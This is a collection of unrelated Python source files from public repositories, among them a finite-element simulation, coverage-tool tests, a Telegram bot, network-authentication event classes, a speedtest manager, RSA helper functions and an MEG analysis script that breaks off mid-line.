\n##########################################################################################\nbtm = CompiledSubDomain(\"near(x[1], btmCoord)\", btmCoord = p_1_y)\nbtmBC = DirichletBC(W, Constant((0.0,0.0,0.0)), btm)\n\n##########################################################################################\n# apply traction, and body forces 
(boundary conditions are within the solver b/c they update)\n##########################################################################################\nT = Constant((0.0, 0.0, 0.0)) # Traction force on the boundary\nB = Constant((0.0, 0.0, 0.0))\n\n##########################################################################################\n# define finite element problem \n##########################################################################################\nu = Function(W)\ndu = TrialFunction(W)\nv = TestFunction(W)\n\n##########################################################################################\n# solver loop\n##########################################################################################\ndef problem_solve(th, stretch, u,du,v):\t\n\texpr = Expression(( \" cos(th)*(x[0]-L0) - sin(th)*(x[2]-L2) - (x[0]-L0) \" , \"stretch\" , \" sin(th)*(x[0]-L0) + cos(th)*(x[2]-L2) - (x[2]-L2)\"), th=th, L0=p_2_x/2.0, L2= p_2_z/2.0 , stretch=stretch,degree=2)\n\n\t# Updated boundary conditions \n\ttop = CompiledSubDomain(\"near(x[1], topCoord)\", topCoord = p_2_y)\n\ttopBC = DirichletBC(W, expr, top)\n\tbcs = [btmBC,topBC]\n\n\t# Kinematics\n\td = len(u)\n\tI = Identity(d) # Identity tensor\n\tF = I + grad(u) # Deformation gradient\n\tF = variable(F)\n\tpsi = 1/2*mu*( inner(F,F) - 3 - 2*ln(det(F)) ) + 1/2*lmbda*(1/2*(det(F)**2 - 1) - ln(det(F)))\n\tf_int = derivative(psi*dx,u,v)\n\tf_ext = derivative( dot(B, u)*dx('everywhere') + dot(T, u)*ds , u, v)\n\tFboth = f_int - f_ext \n\t# Tangent \n\tdF = derivative(Fboth, u, du)\n\t#solve(Fboth == 0, u, bcs, J=dF)\n\t\n\t# --> alternative solver configuration required for larger meshes \n\tproblem = NonlinearVariationalProblem(Fboth, u, bcs, dF)\n\tsolver = NonlinearVariationalSolver(problem)\n\tprm = solver.parameters\n \t# Solver parameters\n\tprm['newton_solver']['linear_solver'] = 'cg'\n\t# Solve variational problem\n\tsolver.solve()\n\t\n\treturn u, du, v, f_int, f_ext, psi \n\n##########################################################################################\n# post processing functions \n##########################################################################################\nto_print = True\n##########################################################################################\ndef rxn_forces(list_rxn,W,f_int,f_ext):\n\tx_dofs = W.sub(0).dofmap().dofs()\n\ty_dofs = W.sub(1).dofmap().dofs()\n\tz_dofs = W.sub(2).dofmap().dofs() # added for 3D\n\tf_ext_known = assemble(f_ext)\n\tf_ext_unknown = assemble(f_int) - f_ext_known\n\tdof_coords = W.tabulate_dof_coordinates().reshape((-1, 3)) # changed from 2 to 3 for 3D\n\ty_val_min = np.min(dof_coords[:,1]) + 10E-5; y_val_max = np.max(dof_coords[:,1]) - 10E-5\n\tx_top = []; x_btm = [] \n\tfor kk in x_dofs:\n\t\tif dof_coords[kk,1] > y_val_max:\n\t\t\tx_top.append(kk)\n\t\tif dof_coords[kk,1] < y_val_min:\n\t\t\tx_btm.append(kk)\n\tf_sum_top_x = np.sum(f_ext_unknown[x_top])\n\tf_sum_btm_x = np.sum(f_ext_unknown[x_btm])\t\t\n\ty_top = []; y_btm = [] \n\tfor kk in y_dofs:\n\t\tif dof_coords[kk,1] > y_val_max:\n\t\t\ty_top.append(kk)\n\t\tif dof_coords[kk,1] < y_val_min:\n\t\t\ty_btm.append(kk)\n\tf_sum_top_y = np.sum(f_ext_unknown[y_top])\n\tf_sum_btm_y = np.sum(f_ext_unknown[y_btm])\t\n\tz_top = []; z_btm = [] # added for 3D\n\tfor kk in z_dofs:\n\t\tif dof_coords[kk,1] > y_val_max:\n\t\t\tz_top.append(kk)\n\t\tif dof_coords[kk,1] < y_val_min:\n\t\t\tz_btm.append(kk)\n\tf_sum_top_z = np.sum(f_ext_unknown[z_top])\n\tf_sum_btm_z = np.sum(f_ext_unknown[z_btm])\n\tif to_print: 
\n\t\tprint(\"x_top, x_btm rxn force:\", f_sum_top_x, f_sum_btm_x)\n\t\tprint(\"y_top, y_btm rxn force:\", f_sum_top_y, f_sum_btm_y)\n\t\tprint(\"z_top, z_btm rxn force:\", f_sum_top_z, f_sum_btm_z)\n\tlist_rxn.append([f_sum_top_x,f_sum_btm_x,f_sum_top_y,f_sum_btm_y,f_sum_top_z,f_sum_btm_z])\n\treturn list_rxn\n\ndef pix_centers(u):\n\tdisps_all_x = np.zeros((28,28))\n\tdisps_all_y = np.zeros((28,28))\n\tdisps_all_z = np.zeros((28,28))\n\tfor kk in range(0,28):\n\t\tfor jj in range(0,28):\n\t\t\txx = jj + 0.5 # x is columns\n\t\t\tyy = kk + 0.5 # y is rows \n\t\t\tzz = p_2_z / 2.0\n\t\t\tdisps_all_x[kk,jj] = u(xx,yy,zz)[0]\n\t\t\tdisps_all_y[kk,jj] = u(xx,yy,zz)[1]\n\t\t\tdisps_all_z[kk,jj] = u(xx,yy,zz)[2]\n\t\n\treturn disps_all_x, disps_all_y, disps_all_z\n\ndef strain_energy(list_psi, psi):\n\tval = assemble(psi*dx)\n\tlist_psi.append(val)\n\treturn list_psi\n\ndef strain_energy_subtract_first(list_psi):\n\tfirst = list_psi[0]\n\tfor kk in range(0,len(list_psi)):\n\t\tlist_psi[kk] = list_psi[kk] - first \n\treturn list_psi\n##########################################################################################\n##########################################################################################\n#fname_paraview = File(folder_name + '/disp.pvd') #<-- primarily for debugging \n\nlist_rxn = []\n\nlist_psi = [] \n\n# --> run the loop\nth_val = [0.0, 0.001, 0.01]\nstr_val = [0.0,0.25/(pi/128)*0.001,0.25/(pi/128)*0.01]\n\nfor kk in range(1,17):\n\tth_val.append(pi/128.0*kk)\n\tstr_val.append(.25*kk)\n\nfname = folder_name + '/pixel_disp' \n\nfor step in range(0,len(th_val)):\n\tth = th_val[step]\n\tstretch = str_val[step]\n\tu, du, v, f_int, f_ext, psi = problem_solve(th,stretch, u,du,v)\n\tlist_rxn = rxn_forces(list_rxn,W,f_int,f_ext)\n\t#fname_paraview << (u,step)\n\tdisps_all_x, disps_all_y, disps_all_z = pix_centers(u)\n\tfn_x = fname + '_step' + str(step) + '_x.txt'\n\tfn_y = fname + '_step' + str(step) + '_y.txt'\n\tfn_z = fname + '_step' + str(step) + '_z.txt'\n\tnp.savetxt(fn_x,disps_all_x)\n\tnp.savetxt(fn_y,disps_all_y)\n\tnp.savetxt(fn_z,disps_all_z)\n\tlist_psi = strain_energy(list_psi, psi)\n\n# --> save reaction forces\nfname = folder_name + '/rxn_force.txt'\nnp.savetxt(fname,np.asarray(list_rxn))\n\n# --> save total (delta) potential energy \nfname = folder_name + '/strain_energy.txt'\nlist_psi = strain_energy_subtract_first(list_psi)\nnp.savetxt(fname, np.asarray(list_psi))\t\n\nend_time = time.time()\n\nfull_time = end_time - start_time\n\nprint('time:')\nprint(full_time)\n\t\n\t\n\t\n\t\n\t\n\t\n\n","repo_name":"elejeune11/Mechanical-MNIST-Transfer-Learning","sub_path":"generate_dataset/run_FEA_simulation_3D_UE_twist.py","file_name":"run_FEA_simulation_3D_UE_twist.py","file_ext":"py","file_size_in_byte":11015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70942206453","text":"import json\nimport mock\nimport os\n\nfrom coverage.control import Coverage\n\nfrom smother.control import get_smother_filename # nopep8\nfrom smother.control import Smother\nfrom smother.tests.utils import tempdir\n\n\ndef test_append():\n a = {\n 'test1': {'a': [1]},\n }\n\n b = {\n 'test1': {'a': [2]},\n 'test2': {'a': [3]}\n }\n\n combine = {\n 'test1': {'a': [1, 2]},\n 'test2': {'a': [3]},\n }\n\n with tempdir() as base:\n outpath = os.path.join(base, '.smother')\n\n smother = Smother()\n smother.data = a\n smother.write(outpath, append=True)\n\n smother = Smother()\n smother.data = b\n smother.write(outpath, 
append=True)\n\n        assert Smother.load(outpath).data == combine\n\n\ndef test_write_coverage():\n\n    a = {\n        'test1': {'a': [1]},\n        'test2': {'a': [2]},\n    }\n\n    expected = {'lines': {os.path.abspath('a'): [1, 2]}}\n\n    with tempdir() as base:\n        path = os.path.join(base, '.coverage')\n\n        cov = Coverage(data_file=path)\n\n        smother = Smother(cov)\n        smother.data = a\n        smother.write_coverage()\n\n        header_len = 63\n        with open(path) as infile:\n            infile.seek(header_len)\n            result = json.load(infile)\n\n        assert result == expected\n\n\ndef test_iter_records_semantic():\n\n    # Default coverage behavior is to emit absolute file paths.\n    smother = Smother()\n    smother.data = {\n        'test1': {os.path.abspath('smother/tests/demo.py'): [8]}\n    }\n\n    expected = [('smother.tests.demo:foo', 'test1')]\n    assert list(smother.iter_records(semantic=True)) == expected\n\n\n@mock.patch('smother.control.random')\n@mock.patch('smother.control.socket')\n@mock.patch('smother.control.os')\ndef test_parallel_mode_suffix(mock_os, mock_socket, mock_random):\n    fake_pid = 12345\n    fake_hostname = \"the_host\"\n    fake_random_int = 99999\n    mock_os.getpid.return_value = fake_pid\n    mock_socket.gethostname.return_value = fake_hostname\n    mock_random.randint.return_value = fake_random_int\n\n    base_name = \".smother\"\n    fake_suffix = \"the_host.12345.099999\"\n    assert get_smother_filename(base_name, False) == base_name\n    assert (\n        get_smother_filename(base_name, True) == base_name + \".\" + fake_suffix)\n\n\ndef test_convert_to_relative_paths():\n    smother = Smother()\n    smother.data = {\n        'test1': {os.path.abspath('smother/tests/demo.py'): [8]}\n    }\n\n    expected_data = {\n        'test1': {'smother/tests/demo.py': [8]}\n    }\n\n    assert Smother.convert_to_relative_paths(smother).data == expected_data\n","repo_name":"ChrisBeaumont/smother","sub_path":"smother/tests/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"21"} +{"seq_id":"32472069083","text":"from .mc_db import McDb\nfrom kasasa_common.database.connection import Connection\n\n\nclass FiMarketingCloud(McDb):\n    \n    def __init__(self, connection: Connection = None):\n        super(FiMarketingCloud, self).__init__(connection)\n        self._table = 'sfmc_product_master'\n        self._table_fields_map = {\n            \"salesforce_product_id\": \"AcctProdIDFull__c\",\n            \"fi_crm_record_id\": \"AcctProductExternalID__c\",\n            \"product_type\": \"Product Class\",\n            \"product_name\": \"Product__c\",\n            \"krp_base_product_id\": \"BillingKrpPid__c\",\n            \"market_this_product\": \"Market_This_Product\",\n            \"product_priority\": \"Product_Priority\",\n            \"opt_in_status\": \"Opt-In_Status\"\n        }\n    \n    def validate(self, set_of_values):\n        return set_of_values.get('AcctProdIDFull__c') is not None","repo_name":"databar-team/nbc","sub_path":"map-marketingcloud-worker/app/worker/data/fi_mc.py","file_name":"fi_mc.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17767590273","text":"def dfs(level, beginWith):\n    if level == r: # case where r items have been picked\n        # print(result)\n        return True\n    global score_sum\n    global cal_sum\n    for i in range(beginWith, len(inputs)):\n        score_sum += inputs[i][0]\n        cal_sum += inputs[i][1]\n        if cal_sum > l:\n            return False\n        # result[level] = inputs[i]\n        dfs(level+1, i+1)\n\n# def check(idx, score, cal):\n#     global score_max\n#\n#     if cal > l:\n#         return\n#\n#     if score > score_max:\n#         score_max = score\n#\n#     if 
idx == n:\n#         return\n#\n#     check(idx+1, score, cal)\n#     check(idx+1, score + inputs[idx][0], cal + inputs[idx][1])\n\nt = int(input())\n\nfor i in range(1, t+1):\n    print(\"#\" + str(i), end=' ') # number of test cases\n\n    n, l = map(int, input().split()) # number of ingredients, calorie limit\n    inputs = list()\n    for _ in range(n):\n        t, k = map(int, input().split())\n        inputs.append((t, k))\n\n    score_max = 0\n    for r in range(1, n+1):\n        score_sum = 0\n        cal_sum = 0\n        if dfs(0,0):\n            score_max = max(score_max, score_sum)\n    print(score_max)\n\n\n\n    # for j in range(1, n+1):\n    #     for combs in combinations(inputs, j):\n    #         t_sum = 0\n    #         k_sum = 0\n    #         for comb in combs:\n    #             t_sum += comb[0]\n    #             k_sum += comb[1]\n    #         if k_sum > l:\n    #             continue\n    #         else:\n    #             t_sum_max = max(t_sum_max, t_sum)\n#\n# print(t_sum_max)\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n# t = int(input())\n#\n# # def combinations(array, r):\n# #     for i in range(len(array)):\n# #         if r == 1:\n# #             yield [array[i]]\n# #         else:\n# #             for next in combinations(array[i+1:], r-1):\n# #                 yield [array[i]] + next\n# #\n# # def combinations2(lst, k):\n# #     if k == 0:\n# #         return [[]]\n# #     arr = []\n# #     for x in range(0, len(lst)):\n# #         m = lst[x]\n# #         _lst = lst[x+1:]\n# #         for p in combinations2(_lst, k-1):\n# #             arr.append([m]+p)\n# #     return arr\n#\n# # combinations(k+1, score + scoreLst(k), cal+calLst(k) : include\n# # combinations(k+1, score, cal) : exclude\n#\n# def combination(idx, score, cal):\n#     global score_max\n#\n# for i in range(1, t+1):\n#     print(\"#\" + str(i), end=' ')\n#\n#     n, l = map(int, input().split())\n#     ts = list()\n#     ks = list()\n#\n#     for _ in range(n):\n#         t, k = map(int, input().split())\n#         ts.append(t)\n#         ks.append(k)\n#\n#     # ts_sums = list()\n#     score_max = 0\n#     for j in range(1, n+1):\n#         combs = list(combinations(ks, j))\n#         for k in range(len(combs)):\n#             combinations(ts, j))[k]\n#             ts_sums.append(sum(list(combinations(ts, j))[k]))\n#     print(score_max)","repo_name":"heeheejj/Algorithm","sub_path":"swea/5215_2.py","file_name":"5215_2.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17445301371","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"bovw\",\n    version=\"0.0.1\",\n    author=\"Tamas Suveges\",\n    author_email=\"stamas01@gmail.com\",\n    description=\"A bag-of-visual-words implementation using sklearn.cluster.KMeans\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/stamas02/BOVW/blob/master/bovw/bovw.py\",\n    packages=[\"bovw\"],\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    python_requires=\">=3.6\",\n    install_requires=[\"opencv-contrib-python\", \"tqdm\", \"scipy\", \"sklearn\"],\n)\n","repo_name":"stamas02/BOVW","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16061605642","text":"#!/usr/bin/env python\n\nimport config\nimport telebot\n\nfrom telebot import types\n\n\n\n\nbot = telebot.TeleBot(config.token)\n@bot.message_handler(commands=['help','start'])\ndef send_welcome(message):\n    bot.reply_to(message, \"Hello, you can use following commands \\n /start \\n /help \\n /links\")\n    \n    \n@bot.message_handler(commands=['links'])\ndef command_help(message):\n    markup = 
types.InlineKeyboardMarkup()\n    itembtna = types.InlineKeyboardButton('open our site', url='www.credit-agricole.ua')\n    itembtnv = types.InlineKeyboardButton('show contacts', url= 'www.umc.ua')\n    itembtnc = types.InlineKeyboardButton('c', switch_inline_query=\"\")\n    markup.row(itembtna)\n    markup.row(itembtnv, itembtnc)\n    bot.send_message(message.chat.id, \"Choose one letter:\", reply_markup=markup)\n\n    \n\n@bot.message_handler(commands=[\"geophone\"])\ndef geophone(message):\n    # These keyboard parameters are optional, just for convenience\n    keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n    button_phone = types.KeyboardButton(text=\"Отправить номер телефона\", request_contact=True)\n    button_geo = types.KeyboardButton(text=\"Отправить местоположение\", request_location=True)\n    keyboard.add(button_phone, button_geo)\n    bot.send_message(message.chat.id, \"---\", reply_markup=keyboard)\n\n\n\nbot.send_location\n \nbot.polling()\n","repo_name":"yvlitvin/test_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21038945005","text":"from ryu.controller.event import EventBase\n\n\nclass EventStartEAPOL(EventBase):\n    \"\"\"EAPoL start received\n    \"\"\"\n    def __init__(self, dpid, src, dst, port):\n        super(EventStartEAPOL, self).__init__()\n        self.dpid = dpid\n        self.src = src\n        self.dst = dst\n        self.port = port\n\n\nclass EventLogoffEAPOL(EventBase):\n    \"\"\"EAPoL logoff received\n    \"\"\"\n    def __init__(self, dpid, port):\n        super(EventLogoffEAPOL, self).__init__()\n        self.dpid = dpid\n        self.port = port\n\n\nclass EventStartEAPMD5Challenge(EventBase):\n    \"\"\"EAP identity response received\n    \"\"\"\n    def __init__(self, dpid, port, identity):\n        super(EventStartEAPMD5Challenge, self).__init__()\n        self.dpid = dpid\n        self.port = port\n        self.identity = identity\n\n\nclass EventFinishEAPMD5Challenge(EventBase):\n    \"\"\"EAP MD5 challenge response received\n    \"\"\"\n    def __init__(self, dpid, port, challenge, identifier):\n        super(EventFinishEAPMD5Challenge, self).__init__()\n        self.dpid = dpid\n        self.port = port\n        self.challenge = challenge\n        self.identifier = identifier\n\n\nclass EventOutputEAPOL(EventBase):\n    \"\"\"Request to send an EAPoL frame\n    \"\"\"\n    def __init__(self, dpid, port, pkt):\n        super(EventOutputEAPOL, self).__init__()\n        self.dpid = dpid\n        self.port = port\n        self.pkt = pkt\n","repo_name":"shimojo-lab/flowsieve","sub_path":"flowsieve/eap_events.py","file_name":"eap_events.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"71193189173","text":"import config\n\ndef getCellByCoords(x, y):\n    row = int(x) // config.CELL_HEIGHT\n    col = int(y) // config.CELL_WIDTH\n\n    return (row, col)\n\ndef getLineEq(x1,y1,x2,y2):\n    A = y1 - y2\n    B = x2 - x1\n    C = -(A * x1 + B * y1)\n\n    return A, B, C\n","repo_name":"EgorovM/firstOOPproject","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33988292968","text":"
codigo,\n 'nome': nome,\n 'altura': altura,\n 'peso': peso\n }\n clientes_academia.append(clientes) \n return clientes_academia\n\ndef total_alturas():\n total_alturas = 0\n for cliente in clientes_academia:\n altura = cliente['altura']\n total_alturas += altura\n return total_alturas\n\ndef total_pesos():\n total_pesos = 0\n for cliente in clientes_academia:\n peso = cliente['peso']\n total_pesos += peso\n return total_pesos\n\ndef maior_cliente():\n maior_cliente = {}\n for cliente in clientes_academia:\n altura = cliente['altura']\n if 'altura' in maior_cliente:\n if altura > maior_cliente['altura']:\n maior_cliente = cliente\n else:\n maior_cliente = cliente\n return maior_cliente['nome']\n\ndef menor_cliente():\n menor_cliente = {}\n for cliente in clientes_academia:\n altura = cliente['altura']\n if 'altura' in menor_cliente:\n if altura < menor_cliente['altura']:\n menor_cliente = cliente\n else:\n menor_cliente = cliente\n return menor_cliente['nome']\n\ndef cliente_mais_gordo():\n cliente_gordo = {}\n for cliente in clientes_academia:\n peso = cliente['peso']\n if 'peso' in cliente_gordo:\n if peso > cliente_gordo['peso']:\n cliente_gordo = cliente\n else:\n cliente_gordo = cliente\n return cliente_gordo['nome']\n\ndef cliente_mais_magro():\n cliente_magro = {}\n for cliente in clientes_academia:\n peso = cliente['peso']\n if 'peso' in cliente_magro:\n if peso < cliente_magro['peso']:\n cliente_magro = cliente\n else:\n cliente_magro = cliente\n return cliente_magro['nome']\n\ndef qtd_clientes():\n qtd = len(clientes_academia)\n return qtd\n\ndef media_altura():\n altura = total_alturas()\n clientes = qtd_clientes()\n media = altura / clientes\n return media\n\ndef media_peso():\n media = total_pesos / qtd_clientes()\n return media\n\nif __name__ == '__main__':\n print(verificar_clientes())\n print(f'Total de clientes: {qtd_clientes()}')\n print(f'Total altura: {total_alturas()}m')\n print(f'Total peso: {total_pesos()}Kg')\n print(f'Maior cliente: {maior_cliente()}')\n print(f'Menor cliente: {menor_cliente()}')\n print(f'Cliente mais gordo: {cliente_mais_gordo()}')\n print(f'Cliente mais magro: {cliente_mais_magro()}')\n print(f'Media de altura: {media_altura()}m')\n print(f'Media de peso: {media_peso()}Kg')","repo_name":"carlosrjhoe/Python","sub_path":"Livro_Guia_prático_de_programação_python/Exercicios/exercicio_33.py","file_name":"exercicio_33.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37452558353","text":"import json\nimport threading\nimport time\nfrom datetime import datetime\n\nimport requests\nimport speedtest\nfrom bson.json_util import dumps\n\nfrom . import settings\nfrom . 
import database\nfrom .logger import logger\n\n\nclass SpeedtestMgr:\n def __init__(self):\n self.st = speedtest.Speedtest()\n self.do_run = True\n self.pause = False\n self.last_result = None\n\n self._sleep = settings.get('scan-interval') * 60\n self._thread = None\n self.__status = \"none\"\n self.__client_info = None\n self.__all_servers = None\n\n def task(self, socketio):\n while self.do_run:\n if self.pause:\n time.sleep(1)\n continue\n\n batch_results = []\n start = datetime.utcnow()\n for server_id in settings.get('servers'):\n sv = self.st.get_servers([server_id])\n sv = sv[list(sv.keys())[0]][0]\n\n logger.debug('Starting speedtest with server: %s (%s - %s) %s',\n sv['sponsor'], sv['name'], sv['country'], sv['host'])\n self.update_status(socketio, \"started\", {'timestamp': str(start)})\n\n # Cancel point\n if not self.do_run:\n break\n\n logger.debug('Testing download speed...')\n self.update_status(socketio, \"downloading\")\n download = self.st.download()\n logger.debug('Download test finished with %s bits', download)\n\n # Cancel point\n if not self.do_run:\n break\n\n logger.debug('Testing upload speed...')\n self.update_status(socketio, \"uploading\")\n upload = self.st.upload()\n logger.debug('Upload test finished with %s bits', upload)\n\n # Cancel point\n if not self.do_run:\n break\n\n results = self.st.results.dict()\n results['server'] = sv\n results['batch_timestamp'] = start.isoformat()\n batch_results.append(results)\n self.last_result = results\n database.insert_result(results)\n\n logger.debug('Speedtest finished: %s', results)\n self.update_status(socketio, \"finished\", json.loads(dumps(results)))\n\n # Cancel point\n if not self.do_run:\n break\n\n # Run at the next scheduled time\n diff = max(self._sleep - (datetime.utcnow() - start).total_seconds(), 15)\n self.update_status(socketio, \"batch_finished\", {\n 'sleep_time': diff, 'results': json.loads(dumps(batch_results))\n })\n\n logger.debug('Waiting for {:.3f} seconds for the next measurement.'.format(diff))\n time.sleep(diff)\n\n def start(self, socketio):\n if self._thread is not None:\n logger.warn('SpeedtestMgr$start already invoked.')\n return\n\n logger.debug('Starting speedtest thread...')\n self._thread = threading.Thread(target=self.task, args=(socketio,))\n self._thread.start()\n logger.debug('Speedtest thread started.')\n\n @property\n def status(self):\n return self.__status\n\n @property\n def client_info(self):\n if self.__client_info is None:\n self.__client_info = requests.get('http://extreme-ip-lookup.com/json/').json()\n\n return self.__client_info\n\n @property\n def servers(self):\n if self.__all_servers is None:\n self.st.get_servers()\n self.__all_servers = [v[0] for k, v in self.st.servers.items()]\n self.__all_servers.sort(key=lambda x: x['d'])\n\n return self.__all_servers\n\n def set_test_servers(self, server_list):\n if not isinstance(server_list, list) and not isinstance(server_list, int):\n raise RuntimeError('server_list must be a list of servers ids or an int')\n\n if isinstance(server_list, int):\n server_list = [server_list]\n\n for server_id in server_list:\n found = False\n for k, server in self.__all_servers:\n if server_id == server['id']:\n found = True\n break\n if not found:\n raise RuntimeError('Server id {} not found'.format(server_id))\n\n self.st.get_servers(server_list)\n\n def update_status(self, socketio, status, data=None):\n self.__status = status\n\n payload = {'status': status, 'data': data}\n socketio.emit('speedtest_update', 
payload)\n","repo_name":"jkcgs/speedtest-probe","sub_path":"stprobe/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21560084173","text":"\"\"\"\n @author: franck\n @datetime: 2020-08-01 14:00\n\"\"\"\n\nimport redis \n# cant import leveldb \n\nclass UrlDB:\n '''Use LevelDB to store URLs what have been done(succeed or faile)\n '''\n status_failure = b'0'\n status_success = b'1'\n\n def __init__(self):\n self.db = redis.Redis(host='localhost', port=6379, db=0)\n\n def set_success(self, url):\n if isinstance(url, str):\n url = url.encode('utf8')\n try:\n self.db.set(url, self.status_success)\n s = True\n except:\n s = False\n return s\n\n def set_failure(self, url):\n if isinstance(url, str):\n url = url.encode('utf8')\n try:\n print(url)\n self.db.set(url, self.status_failure)\n s = True\n except:\n s = False\n return s\n\n def has(self, url):\n if isinstance(url, str):\n url = url.encode('utf8')\n try:\n attr = self.db.get(url)\n return attr\n except:\n pass\n return False\n\nif __name__ == \"__main__\":\n mytest = UrlDB()\n a = mytest.set_success('http://baidu.com')\n b = mytest.set_failure('http://weibo.com')\n c = mytest.has('http://baidu.com')\n print(a)\n print(b)\n print(c)","repo_name":"franckisses/python_spider","sub_path":"code/leverdb_test.py","file_name":"leverdb_test.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38888951104","text":"def mod_pow(__base: int, __exponent: int, __modulus: int) -> int:\r\n # based on the implementation shown in the textbook\r\n result = 1\r\n while __exponent > 0:\r\n if __exponent % 2 == 1:\r\n result = (result * __base) % __modulus\r\n __exponent //= 2\r\n __base = (__base * __base) % __modulus\r\n return result\r\n\r\n\r\ndef decryptRSA(__ciphertext: list[int], __secret_key: int, __modulus: int) -> str:\r\n plaintext = [mod_pow(code, __secret_key, __modulus) for code in __ciphertext]\r\n # print message\r\n message = ''\r\n for code in plaintext:\r\n message += chr(code)\r\n return message\r\n\r\n\r\ndef trial_division(__num: int):\r\n # based on the implementation shown in the textbook\r\n L = []\r\n while __num % 2 == 0:\r\n L.append(2)\r\n __num //= 2\r\n factor = 3\r\n while factor * factor <= __num:\r\n if __num % factor == 0:\r\n L.append(factor)\r\n __num //= factor\r\n else:\r\n factor += 2\r\n if __num != 1:\r\n L.append(__num)\r\n return L\r\n","repo_name":"asimakiskydros/University-Projects","sub_path":"Cryptography/project #2/code/myfuncs.py","file_name":"myfuncs.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16524312625","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 30 13:00:25 2020\n\n@author: ja151\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 31 15:51:58 2020\n\n@author: ja151\n\"\"\"\n\nimport mne\nimport pickle\nimport numpy as np\nimport os\n\npaths = {'in': '/autofs/cluster/transcend/MEG/speech/',\n 'local': '/local_mount/space/hypatia/1/users/jussi/speech/',\n 'erm': '/autofs/cluster/transcend/MEG/erm/',\n 'fs': '/autofs/cluster/transcend/MRI/WMA/recons/',\n 'cluster': '/autofs/cluster/transcend/jussi/'\n }\n\nf = open('%s/p/subjects.p' % paths['cluster'], 'rb')\nsub_info = 
pickle.load(f)\nf.close()\n\n# define bad subjects\n# bad_subs = ['105801', '107301']\nbad_subs = ['105801', '107301', '052902', '090902', '048102', '075401', '096603']\nfor bad_sub in bad_subs:\n ind = sub_info['sub_ID'].index(bad_sub)\n n_subs = len(sub_info['sub_ID'])\n [sub_info[key].pop(ind) for key in sub_info.keys() \n if len(sub_info[key])==n_subs]\nsub_IDs = sub_info['sub_ID']\n# sub_IDs = ['083701', '089201', '093101']\n\n\n# conditions\nconds = ['all']\nn_conds = len(conds)\nequalize_event_counts = False\ncombine_conds = False\n\n# rois\nroi_names = ['AC_dSPM_5verts_MSS_SWS_peak0-500ms_auto-lh',\n 'seed_AC_wpli2_debiased_8-12Hz_28TD_vs_28ASD_MSS-SWS_cdt0.01_pht1e-08-lh'\n ]\nroi_labels = ['AC', 'con_phte-8']\naverage_verts = True # False, True, or ROI-specific vector\n\nsave_prefix = 'ACseedConClusters'\n\n# params for source estimates\nsnr = 1.0\nlambda2 = 1.0 / snr ** 2\nstc_method = 'MNE'\npick_ori = 'normal'\ntc_extract = 'mean_flip'\n\n# Read the source space \nsrc_fname = '%s/fsaverageJA/bem/fsaverageJA-oct6-src.fif' % paths['fs']\nsrc_fsave = mne.read_source_spaces(src_fname)\nverts_fsave = [s['vertno'] for s in src_fsave]\n\n#%% \n\nfor sub_ID in sub_IDs:\n local_path = '%s/%s/' % (paths['local'], sub_ID)\n cluster_path = '%s/%s/' % (paths['cluster'], sub_ID)\n inv = mne.minimum_norm.read_inverse_operator('%s/%s_0-200Hz-oct6-inv.fif' \n % (local_path, sub_ID))\n src = inv['src'] \n verts = [s['vertno'] for s in src]\n n_verts = len(np.concatenate(verts))\n fs_id = sub_info['FS_dir'][sub_info['sub_ID'].index(sub_ID)]\n \n epochs = mne.read_epochs('%s/%s_speech_0-200Hz_notch60Hz_-500-2000ms-epo.fif' \n % (local_path, sub_ID), proj=False)\n sfreq = epochs.info['sfreq']\n \n if equalize_event_counts:\n # check which conditions only have one stimulus\n conds1 = [cond for cond in conds if len(epochs[cond].event_id)==1]\n if conds1:\n epochs1 = [epochs[cond] for cond in conds1]\n # and which two\n conds2 = list(set(conds) - set(conds1))\n # equalize those with one first\n print('Equalizing epoch counts for %s' % conds1)\n epochs.equalize_event_counts(conds1)\n if conds2:\n print('Dropping epochs from %s to match %s' % (conds2, conds1))\n # and then equalize those with two with the number of those with one\n n_epochs = len(epochs[conds1[0]])\n epochs2 = [epochs[cond][0:n_epochs] for cond in conds2]\n # combine back to one dict\n epochs = {cond: epochs for cond,epochs \n in 